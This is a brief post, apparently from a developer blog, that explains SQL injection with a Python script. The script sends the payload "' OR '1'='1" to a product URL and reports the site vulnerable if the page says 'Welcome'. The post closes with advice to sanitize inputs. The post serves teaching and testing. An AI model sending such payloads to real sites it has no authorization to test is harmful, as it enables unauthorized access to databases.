The purpose of this project is to demonstrate how SQL injection works. This malicious functionality sends SQL queries to a vulnerable web application for testing the injection susceptibility.
Code Example:
import requests
def test_sql_injection(url):
payload = "' OR '1'='1"
response = requests.get(url, params={'id': payload})
if "Welcome" in response.text:
print("Vulnerable to SQL Injection")
else:
print("Safe")
url = "http://example.com/product?id="
test_sql_injection(url)
Use Case: This is a script that tests web applications against SQL injection vulnerabilities and shows how adversaries generally manipulate databases.
Tip: Make sure to always sanitize all user inputs into the web applications against SQL injection attacks.
Top comments (0)